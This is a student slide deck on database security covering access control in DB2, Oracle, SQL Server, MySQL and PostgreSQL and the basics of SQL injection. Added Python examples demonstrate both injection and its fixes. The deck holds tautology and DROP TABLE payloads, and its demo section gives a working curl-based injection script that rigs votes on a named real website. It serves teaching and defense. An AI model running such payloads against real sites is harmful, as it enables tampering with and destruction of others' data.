![Page 1: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/1.jpg)
Database Security
Types of attacks and mitigation strategies
Group Members:
Tushar Sugandhi
Natthapol Prakongpan
Travis Whilden
Brendan Kohlar
Jonathan Reitnauer
![Page 2: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/2.jpg)
Database Access Control
Part I
![Page 3: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/3.jpg)
Review Databases
• IBM DB2
• Oracle
• Microsoft SQL Server
• MySQL
• PostgreSQL
![Page 4: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/4.jpg)
Security Mechanisms
• Authentication
– Who is allowed access to the instance and/or database
– Where and how a user's password will be verified
• Authorization
– The authority level that a user is granted
– The commands that a user is allowed to run
– The data that a user is allowed to read and/or alter
– The database objects a user is allowed to create, alter, and/or drop
• Privileges
– Granular authorization
![Page 5: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/5.jpg)
IBM DB2 Authentication
– Works closely with the security features of the underlying operating system to verify user IDs and passwords.
– Can use Kerberos to authenticate users.
![Page 6: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/6.jpg)
IBM DB2 Authorization
• Determine the operations that users and/or groups can perform.
• Determine the data objects that users can access.
• Five authority levels:
– SYSADM
– SYSCTRL
– SYSMAINT
– DBADM
– LOAD
![Page 7: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/7.jpg)
IBM DB2 Privileges
• More granular than authorities.
• Can be assigned to users and/or groups.
• Help define the objects that a user can create or drop.
• Help define the commands that a user can use to access objects (tables, views, indexes, packages).
![Page 8: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/8.jpg)
Oracle Security
• Authentication (Identity Management)
• Virtual Private Database
• Oracle Label Security– Row-level access control (an authorization mechanism, not authentication)
![Page 9: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/9.jpg)
Oracle Identity Management
• LDAP Directory Service
• Directory integration and provision services
• Authentication and authorization services
• Certificate authority (CA)
![Page 10: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/10.jpg)
Oracle Virtual Private Database
• Attaches a security policy to a table, view or synonym; the policy function returns a predicate that is appended to every query against that object.
• Relevant columns and column masking: a policy can be made to fire only when specific columns are referenced, or to return NULL for the protected columns instead of hiding whole rows.
![Page 11: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/11.jpg)
Oracle Label Security
• Provides a secure engine and data dictionary for managing access to data using sensitivity labels.
• Row-level security is achieved with no application programming required.
• Sensitivity labels on rows and on user sessions determine a user's ability to view and update data.
![Page 12: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/12.jpg)
Oracle Label Security
![Page 13: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/13.jpg)
Microsoft SQL Server
• Authentication
• Access Permission
• Roles
![Page 14: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/14.jpg)
MS SQL Authentication
• Two methods for user authentication
• Windows authentication
– Default and preferred
– Authentication is delegated to the underlying operating system (Windows/Active Directory)
• SQL Server authentication
– Strongly discouraged
– Not as secure: the password is carried in the login packet and checked by SQL Server itself (only trivially obfuscated on the wire unless the connection is encrypted)
![Page 15: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/15.jpg)
MS SQL Access Permission
• Statement Permissions
![Page 16: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/16.jpg)
MS SQL Access Permission
• Object Permissions
![Page 17: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/17.jpg)
MS SQL Roles
![Page 18: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/18.jpg)
![Page 19: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/19.jpg)
![Page 20: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/20.jpg)
MySQL
• Limited Security Features
• Authentication
• Permission
![Page 21: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/21.jpg)
MySQL Authentication
• Accounts and grants live in the user/grant tables of the mysql system database.
• Passwords are stored as hashes (the pre-4.1 hash format is weak), and the tables can be read by any account that has SELECT on the mysql database if privileges are not locked down.
• No ties to the OS: no OS-level or Kerberos authentication.
• MySQL's root account has no password by default.
![Page 22: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/22.jpg)
MySQL Permission
• Table level control
• Column level control
• No row level control (can only be emulated with views)
![Page 23: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/23.jpg)
![Page 24: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/24.jpg)
PostgreSQL Authentication (chosen per connection type, database, user and client address in pg_hba.conf)
• Trust Authentication– No credential check at all: any client that can reach the server is accepted as whatever role it names. Safe only for local, fully trusted connections.
• Password Authentication– md5, crypt, or password (cleartext on the wire), verified against the server's own role catalog
• Kerberos Authentication– Tickets issued by a Kerberos authentication server
• Ident-based Authentication– The client's operating-system user name (reported by the client host's ident server, or taken from the local socket) is mapped to a database role
• Pluggable Authentication Module (PAM)– Delegates to a custom or OS authentication stack
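Which of these methods applies to a given client is decided line by line in pg_hba.conf, so the weak choices (trust reachable from the network, cleartext password, ident over the network) are a configuration audit. The following is an added example, not part of the deck: a small Python audit of a constructed pg_hba.conf. The field layout (TYPE, DATABASE, USER, ADDRESS, METHOD) follows PostgreSQL's pg_hba.conf format; the file contents and the severity labels are this example's own.

```python
# Added example: audit a pg_hba.conf for weak authentication choices.
# SAMPLE_PG_HBA is constructed for the example; it is not a real server's file.
import ipaddress

SAMPLE_PG_HBA = """
# TYPE  DATABASE  USER      ADDRESS         METHOD
local   all       postgres                  peer
local   all       all                       trust
host    all       all       127.0.0.1/32    md5
host    all       all       0.0.0.0/0       trust
host    app       app       10.0.0.0/8      password
hostssl app       app       10.0.0.0/8      scram-sha-256
host    all       all       ::1/128         ident
"""


def parse_pg_hba(text):
    """Return (type, database, user, address, method) tuples; comments skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        f = line.split()
        if f[0] == "local" and len(f) >= 4:
            # local (Unix socket) lines have no ADDRESS column
            rules.append(("local", f[1], f[2], None, f[3]))
        elif f[0] != "local" and len(f) >= 5:
            addr, rest = f[3], f[4:]
            # "ip-address netmask" form: fold into "ip/netmask"
            if "/" not in addr and len(rest) >= 2 and rest[0][:1].isdigit():
                addr, rest = addr + "/" + rest[0], rest[1:]
            rules.append((f[0], f[1], f[2], addr, rest[0]))
    return rules


def _is_loopback(addr):
    if addr == "samehost":
        return True
    try:
        return ipaddress.ip_network(addr, strict=False).is_loopback
    except ValueError:  # hostname, "all", "samenet": assume reachable from elsewhere
        return False


def audit_pg_hba(text):
    """Return (severity, rule, reason) for every rule using a weak method."""
    findings = []
    for ctype, db, user, addr, method in parse_pg_hba(text):
        remote = ctype != "local" and not _is_loopback(addr)
        reason = None
        if method == "trust":
            reason = "no credential check: any client that can connect is accepted as any role"
        elif method == "password":
            reason = "cleartext password in the login packet; use scram-sha-256 (md5 on old servers)"
        elif method == "ident" and remote:
            reason = "ident over the network trusts the client host's identd reply, which the client controls"
        if reason is None:
            continue
        severity = "high" if remote else "medium"
        findings.append((severity, f"{ctype} {db} {user} {addr or '(socket)'} {method}", reason))
    return findings


if __name__ == "__main__":
    for severity, rule, reason in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"[{severity}] {rule}: {reason}")
```

On the sample file the audit flags the socket-level trust line as medium and the two network-reachable lines (trust for 0.0.0.0/0 and cleartext password for 10.0.0.0/8) as high; md5 on loopback, scram-sha-256 over hostssl, peer, and ident on ::1 pass.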
![Page 25: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/25.jpg)
PostgreSQL Permission
• Read– SELECT
• Append– INSERT
• Write– UPDATE/DELETE
• Rules– The RULE privilege lets a user define rewrite rules on a table (older releases); it does not let a user change other users' permissions
• Super user– Bypasses all permission checks; otherwise only the object owner (or a grantee holding WITH GRANT OPTION) can GRANT and REVOKE on an object
![Page 26: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/26.jpg)
![Page 27: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/27.jpg)
![Page 28: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/28.jpg)
Features Comparison

| | DB2 | Oracle | MS SQL | MySQL | PostgreSQL |
|---|---|---|---|---|---|
| Authentication | Multiple, Good | Multiple, Good | OS, No Option | User Table, Poor | Multiple, Good |
| Permission | Good | Good | Good | Poor | Good |
| Row Level | View | Native | View | View | View |
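Four of the five columns show row-level control as "View": the filter lives in a view whose WHERE clause reads the caller's identity, and the application role is granted SELECT on the view but not on the base table. The following is an added example, not code from the deck, showing that pattern on an in-memory SQLite database with constructed data; the session function name app_user() is this example's own. SQLite has no GRANT, so the step that hides the base table from the application role is stated in a comment rather than executed.

```python
# Added example: row-level filtering emulated with a view over a session identity.
import sqlite3


def build_db():
    """Constructed sample data: orders owned by two application users."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE orders(id INTEGER PRIMARY KEY, owner TEXT NOT NULL, amount INTEGER);
        INSERT INTO orders VALUES (1, 'alice', 10), (2, 'bob', 20), (3, 'alice', 30);
    """)
    return db


class AppSession:
    """Per-connection application identity, exposed to SQL as app_user()."""

    def __init__(self, db):
        self.user = None
        # SQL function that reads the session variable on every evaluation
        # (deterministic=False stops SQLite from caching its result).
        db.create_function("app_user", 0, lambda: self.user, deterministic=False)
        # In a real DBMS the application role gets SELECT on this view only;
        # the base table orders is not granted to it.
        db.execute("CREATE VIEW my_orders AS "
                   "SELECT id, amount FROM orders WHERE owner = app_user()")


def visible_order_ids(db, session, user):
    """Set the session identity and read through the filtered view."""
    session.user = user
    return [row[0] for row in db.execute("SELECT id FROM my_orders ORDER BY id")]


def demo():
    db = build_db()
    session = AppSession(db)
    alice = visible_order_ids(db, session, "alice")   # [1, 3]
    bob = visible_order_ids(db, session, "bob")       # [2]
    # Fail closed: with no identity set, owner = NULL matches no row.
    nobody = visible_order_ids(db, session, None)     # []
    return alice, bob, nobody


if __name__ == "__main__":
    print(demo())
```

The design point is the last case: the predicate must fail closed when the identity is unset, because with pooled connections a session variable that is not reset between requests is the easiest way to leak another user's rows.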
![Page 29: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/29.jpg)
SQL INJECTION ATTACKS
THE BASICS
Part II
![Page 30: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/30.jpg)
What is SQL Injection?
• A vulnerability in the application layer in front of the database, not in the DBMS itself
• User input that is not properly handled is concatenated into a SQL statement and sent to the DBMS, so the attacker's text is parsed as part of the query
![Page 31: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/31.jpg)
Where is it Done?
• Potentially any field that takes user input!
– The user name or password field of a login form is the location most commonly associated with SQL injection
![Page 32: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/32.jpg)
Specifically…
• SQL Injection attacks can be broken down into the exploitation of two vulnerabilities
– Improper handling of quote/escape characters in string input
– Weak type enforcement on non-string input
![Page 33: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/33.jpg)
Vulnerability: Escape Characters
• When the characters that delimit or escape SQL string literals (the single quote, the backslash) are not properly filtered from user input
– The input terminates the current string literal, and whatever follows is parsed as SQL, such as an always-true comparison of a dummy value with itself
• The condition 'X' = 'X' is always true, so OR 'X'='X' makes the whole WHERE clause true
![Page 34: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/34.jpg)
Example: Escape Characters Exploit
• Application prompts the user for userName and builds the query by string concatenation:
– statement := "SELECT * FROM users WHERE name = '" + userName + "';"
• User types partial SQL into the prompt:
– a' or 't'='t
• statement becomes:
– SELECT * FROM users WHERE name = 'a' or 't'='t';
• The OR condition is always true, so every row of users is returned
![Page 35: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/35.jpg)
Vulnerability: Weak Type Enforcement
• When type constraints are not properly enforced on user input
– A malicious user supplies a value of a different type than the application intended (SQL text where a number was expected)
![Page 36: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/36.jpg)
Example: Weak Type Enforcement Exploit
• Application prompts the user for a numeric row id and builds the query by concatenation, without checking that the value is a number:
– statement := "SELECT * FROM data WHERE id = " + a_variable + ";"
• User types a string into the prompt:
– 1;DROP TABLE users
• statement becomes:
– SELECT * FROM data WHERE id = 1;DROP TABLE users;
• Execution deletes the users table from the database
– Caveat: the DROP only runs where the driver and server accept stacked statements (SQL Server batches do; PHP's mysql_query() does not). Where they do not, the missing type check still allows OR and UNION injection inside the single statement.
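Both exploits above, run end to end, as an added example that is not part of the deck: the two vulnerable functions build their statements by concatenation exactly as the slides show, against an in-memory SQLite database with constructed users and data tables. The stacked-statement case also shows the driver caveat: Python's sqlite3 execute() refuses a second statement, while executescript() behaves like a server that accepts batches.

```python
# Added example: the tautology and stacked-statement injections from the slides,
# against a constructed SQLite schema (not the demo site's database).
import sqlite3


def fresh_db():
    """Constructed sample schema matching the slides' users and data tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 's3cret'), ('bob', 'hunter2');
        CREATE TABLE data(id INTEGER PRIMARY KEY, payload TEXT);
        INSERT INTO data VALUES (1, 'one'), (2, 'two');
    """)
    return db


def lookup_user_vulnerable(db, user_name):
    # Concatenation as on the slide: a quote in the input closes the literal
    # and everything after it is parsed as SQL.
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return db.execute(statement).fetchall()


def select_row_vulnerable(db, a_variable):
    # No type check: a_variable is meant to be an integer id but is spliced in as text.
    statement = "SELECT * FROM data WHERE id = " + a_variable + ";"
    # executescript() runs every statement in the string, like a server/driver
    # that accepts stacked queries.
    db.executescript(statement)


def execute_refuses_stacked(db, statement):
    """True if the single-statement API rejects a stacked payload (driver caveat)."""
    try:
        db.execute(statement)
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return True
    return False


def table_exists(db, name):
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                     (name,)).fetchone()
    return row is not None


def demo():
    db = fresh_db()
    # Tautology: 'a' matches nobody, but OR 't'='t' matches every row, passwords included.
    rows = lookup_user_vulnerable(db, "a' or 't'='t")
    # Same payload through the one-statement API is refused...
    refused = execute_refuses_stacked(db, "SELECT * FROM data WHERE id = 1;DROP TABLE users;")
    # ...but through the batch API the second statement runs.
    select_row_vulnerable(db, "1;DROP TABLE users")
    return len(rows), refused, table_exists(db, "users")


if __name__ == "__main__":
    print(demo())
```

demo() returns 2 rows for a query that should have matched none, True for the refused stacked call, and False because the users table is gone afterwards.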
![Page 37: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/37.jpg)
Protection From Attack
• Sanitize the data
• Secure the application
• Safeguard the input
• Use stored procedures
![Page 38: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/38.jpg)
Protection: Sanitize the Data
• More than simply adding backslashes!
– Use a default-deny (allow-list) filter that keeps only the characters the field legitimately needs:
• s/[^0-9a-zA-Z]//g keeps only alphanumeric characters
– Strip quotation marks from fields that must never contain them
– Only workable for fields with a narrow legal alphabet (handles, codes); free text needs parameter binding rather than character stripping
![Page 39: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/39.jpg)
Protection: Secure the Application
• People are the weakest link
– Limit access to only those who need it!
– Set each individual's access to the lowest required permissions (the application's own database account included)
![Page 40: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/40.jpg)
Protection: Safeguard the Input
• Check your database interface for input handling functions
– Proper quote handling in string parsing
– Deal with backslashes accordingly
![Page 41: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/41.jpg)
Protection: Use Stored Procedures
• A viable alternative…
– Resolves issues with dynamic input, because values arrive as typed parameters instead of being spliced into SQL text
– Tailored to the specific needs of the database
– Caveat: a procedure that builds its own dynamic SQL from its parameters (executing a concatenated string) is just as injectable; the protection comes from parameter binding, which prepared statements give you without a stored procedure
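The hardened form of the two slide examples, as an added example that is not part of the deck: parameter binding for the string lookup, integer type enforcement for the row id, and the slide's alphanumeric allow-list filter as a second layer. The schema is the same constructed SQLite sample; the function names are this example's own.

```python
# Added example: the slides' two vulnerable queries rewritten with binding,
# type enforcement and an allow-list filter, on a constructed SQLite schema.
import re
import sqlite3


def fresh_db():
    """Constructed sample schema matching the slides' users and data tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 's3cret'), ('bob', 'hunter2');
        CREATE TABLE data(id INTEGER PRIMARY KEY, payload TEXT);
        INSERT INTO data VALUES (1, 'one'), (2, 'two');
    """)
    return db


def lookup_user_safe(db, user_name):
    # Parameter binding: the value travels separately from the SQL text, so a
    # quote in it can never terminate the literal.
    return db.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()


def select_row_safe(db, a_variable):
    # Type enforcement: reject anything that is not an integer before it
    # reaches the query, then still bind it rather than concatenate.
    row_id = int(a_variable)            # ValueError for "1;DROP TABLE users"
    return db.execute("SELECT * FROM data WHERE id = ?", (row_id,)).fetchall()


NON_ALNUM = re.compile(r"[^0-9A-Za-z]")


def sanitize_alnum(value):
    # Default-deny character filter, the Python form of s/[^0-9a-zA-Z]//g.
    # Second layer only: fine for handles and codes, useless for free text.
    return NON_ALNUM.sub("", value)


def demo():
    db = fresh_db()
    rows = lookup_user_safe(db, "a' or 't'='t")     # []: no user has that literal name
    try:
        select_row_safe(db, "1;DROP TABLE users")
        accepted = True
    except ValueError:
        accepted = False                             # payload never reaches SQL
    still_there = db.execute("SELECT count(*) FROM users").fetchone()[0]
    return rows, accepted, still_there, sanitize_alnum("a' or 't'='t")


if __name__ == "__main__":
    print(demo())
```

With the same two payloads as before, the tautology now matches nothing, the stacked statement is rejected as a non-integer before any SQL is built, both users survive, and the filter reduces the first payload to "aortt".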
![Page 42: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/42.jpg)
DEMO
Part III
![Page 43: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/43.jpg)
SQL Injection Demo
Attack a real website using SQL injection
![Page 44: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/44.jpg)
SQL Injection Demo
• Bestthing.info: Comparing apples to oranges and oranges to racecars.
• User-driven content with database backend
• Quest to find the “best thing ever”
• Mirror of the site at injection.pycoder.net
![Page 45: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/45.jpg)
![Page 46: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/46.jpg)
![Page 47: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/47.jpg)
Plan of attack
• Put a phrase at the top of the "Best" phrases
• Must get around the protection against duplicate IP addresses
![Page 48: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/48.jpg)
Site Code

HTML:
```html
<form method="post" action="/">
  <div>
    <input name="tid0" value="27356" type="hidden" />
    <input name="tid1" value="35705" type="hidden" />
    <input name="A" type="submit" value="Having a funny hat" />
    or
    <input name="B" type="submit" value="Bs" />
    <br /><br />
    <input type="submit" name="d" value="Report this pair as a duplicate." />
  </div>
</form>
```

PHP (as on the slide; $forA, $o and $t are set elsewhere and not shown):
```php
// Vulnerable: the hidden fields tid0 and tid1 are concatenated into the INSERT
// unescaped and without being checked as integers.
mysql_query('INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES ('
    .ip2long($_SERVER['REMOTE_ADDR']).',now(),'
    .$_POST['tid0'].','.$_POST['tid1'].','
    .(isset($_POST['A'])?1:0).')');
// The vote is only counted when the INSERT actually wrote a row, which is
// where the duplicate-IP protection lives.
if(mysql_affected_rows()>0) {
    mysql_query('UPDATE thing SET votesFor=votesFor+'.$forA.', votesTotal=votesTotal+1 WHERE tid='.$o);
    mysql_query('UPDATE thing SET votesFor=votesFor+'.($forA?0:1).', votesTotal=votesTotal+1 WHERE tid='.$t);
}
```
![Page 49: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/49.jpg)
Attack Code

Python script (Python 2: the commands module does not exist in Python 3; straight quotes and indentation restored from the slide):
```python
#!/usr/bin/python
import random, commands

# Each request submits a never-repeated random (tid0, tid1) pair, so the INSERT
# into votes never collides with an earlier vote from this IP and the
# vote-counting UPDATEs that follow it run every time.
x = [random.randint(4000, 400000)]
for n in range(600):
    while True:
        p = random.randint(4000, 400000)
        if not p in x:
            x.append(p)
            break
    # tid0 closes the VALUES list early ("..., 1)") and "#" comments out the rest
    # of the INSERT, so the tid1 field is never parsed. The backslashes are shell
    # escapes for the spaces and parenthesis inside curl's -d value.
    commands.getoutput((r"curl -d tid0=%i,%i,1\)\ # -d tid1=-1\ or\ "
                        + r"thing=\'test\' -d B=submit "
                        + r"http://injection.pycoder.net") % (x[-2], x[-1]))
```
![Page 50: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/50.jpg)
![Page 51: .ppt](https://reader033.fdocuments.in/reader033/viewer/2022061210/54901d7db47959f1728b45a2/html5/thumbnails/51.jpg)
Thank you !!!